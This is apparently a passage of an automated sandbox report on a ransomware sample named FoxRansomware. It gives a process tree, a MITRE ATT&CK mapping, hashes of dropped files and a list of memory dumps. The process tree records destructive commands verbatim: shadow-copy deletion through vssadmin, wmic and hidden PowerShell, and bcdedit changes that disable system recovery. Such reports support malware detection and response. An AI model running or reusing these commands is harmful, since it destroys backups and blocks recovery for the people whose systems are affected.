        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928

C:\Windows\system32\taskeng.exe
taskeng.exe {CAEF60C4-B49B-434A-B596-E8C154320CCF} S-1-5-21-406356229-2805545415-1236085040-1000:IKJSPGIM\Admin:Interactive:[1]
1⤵
PID:2876
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\F6YtAyD6.bat"
  2⤵
  PID:3232
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:4444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4704
  - - C:\Windows\system32\vssadmin.exe
      "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:4840
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:240
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2196
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1908

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf

Filesize
8KB

MD5
c924ad9e1403bb68d7f2689cd6df7437

SHA1
3fcfb4984f8a67fdcd5ce73d652260a2f567b49f

SHA256
2754a0f2072ee8c7051e286035462bcc0343402574872ed69e7bf6f82addf76f

SHA512
6020263294101b9e61ab85dd36e5770a6dc00b64957b093d618d83a52254d2936089677cbbe7f5681d3e2d3e121590a0e932f9718d9d870cd11968d1daa5d849

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3F0OFZk1.bat

Filesize
246B

MD5
bf1781f13bd262b95202f1482d76492d

SHA1
14fa8f2be9c87beed9b17c9366cd28256089ad0e

SHA256
f909a119cd169036d45d967a76d94aac58372fbec2d7daef08d07de23d4fe5a9

SHA512
1e675a4d0dd51cf2028ec528b8ff5a283fccc983cd9bf722b90c3ff6eaba79bb16776c8e83144c92cf5dd623092d0b1048795d00e347582bac36e5b9de3cd283

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_5E907C9709EBDB87.txt

Filesize
16KB

MD5
ead641a92520cb535eca5ebdd1afb52c

SHA1
0b4019c658fc07697e3fd0174786c21a5dbbb47b

SHA256
b0f7f72df62c5c79c48be89f4a20b1e7f6eb8cd085a942d4f5ffabf75de95745

SHA512
d865a940ac7f8bd843a07790fd10364939283ca69320135de6a80b7e213133705c668e222527065925b931da24bac5e38f5f9c314f407a5604b52fb823f66274

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kIOKkoKp.txt

Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Roaming\F6YtAyD6.bat

Filesize
415B

MD5
8897903022d1329e6a75170c3bdc414c

SHA1
1da4b4b9b39b368ee5492e09ac849c9e0873c618

SHA256
dac4ccdf537578004a29b43feb4c7551440322fdb09b05b366a1f3cd6461e80b

SHA512
e79fdd86b93dd24fd32a714df51783add6af40d53fc62de83f2fd773f5b6639e7e232f5395a603be84099bc0d4bb158d26e59f32aae9629fa68374faa0bed365

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FCDBZXYS48AS527X62DM.temp

Filesize
7KB

MD5
40ad1be6b3443bfccc88c3d65633c0d3

SHA1
6879267a9db643762985f94b31fa2084038af25f

SHA256
d52a2892d4e34e916880b0e02670072340e5b39d87e750605e2fb04424a6efaa

SHA512
5ac06de9242115e0a77f92cae643c70dc004f5595eebeb4d47a57a6ca5d1b8d4d52c27b4ed9f0e6d16d18ab4c5ac97b0583ff215770db51e246780abac3cc371

Download Submit
C:\Users\Admin\AppData\Roaming\vnIhreog.vbs

Filesize
260B

MD5
45f395eeb4fc0d4bb45b31edaf513a98

SHA1
b889bb975fc01e8bd66e81888d8b5578d2c69ceb

SHA256
7e442ba03eb7879ff96be26969af8037c8d7aa691c9edec1aa3674e6bba0d651

SHA512
612f886ba70d70835546d26ae281ead7816c55f69dccf1a8647a381b0f4e023595ace3218493250f8f0093604fe3df1d61393840a78a5038d98f3f43e2279081

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\NWBuRTjd.exe

Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\dghZRO1Y.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\dghZRO1Y64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
memory/880-13653-0x0000000001FA0000-0x0000000002017000-memory.dmp

Filesize
476KB

Download
memory/880-1679-0x0000000001FA0000-0x0000000002017000-memory.dmp

Filesize
476KB

Download
memory/1800-1874-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2168-108-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2168-14687-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2168-13656-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2168-14483-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2168-8881-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2168-9096-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2632-8-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2688-15-0x0000000074420000-0x00000000749CB000-memory.dmp

Filesize
5.7MB

Download
memory/2688-13-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/2688-11-0x0000000074420000-0x00000000749CB000-memory.dmp

Filesize
5.7MB

Download
memory/2688-12-0x0000000074420000-0x00000000749CB000-memory.dmp

Filesize
5.7MB

Download
memory/2688-14-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/4704-14693-0x000000001B220000-0x000000001B502000-memory.dmp

Filesize
2.9MB

Download
memory/4704-14694-0x0000000002690000-0x0000000002698000-memory.dmp

Filesize
32KB

Download
memory/4704-14695-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/4704-14696-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/4704-14697-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/4704-14698-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/4704-14702-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/4704-14703-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download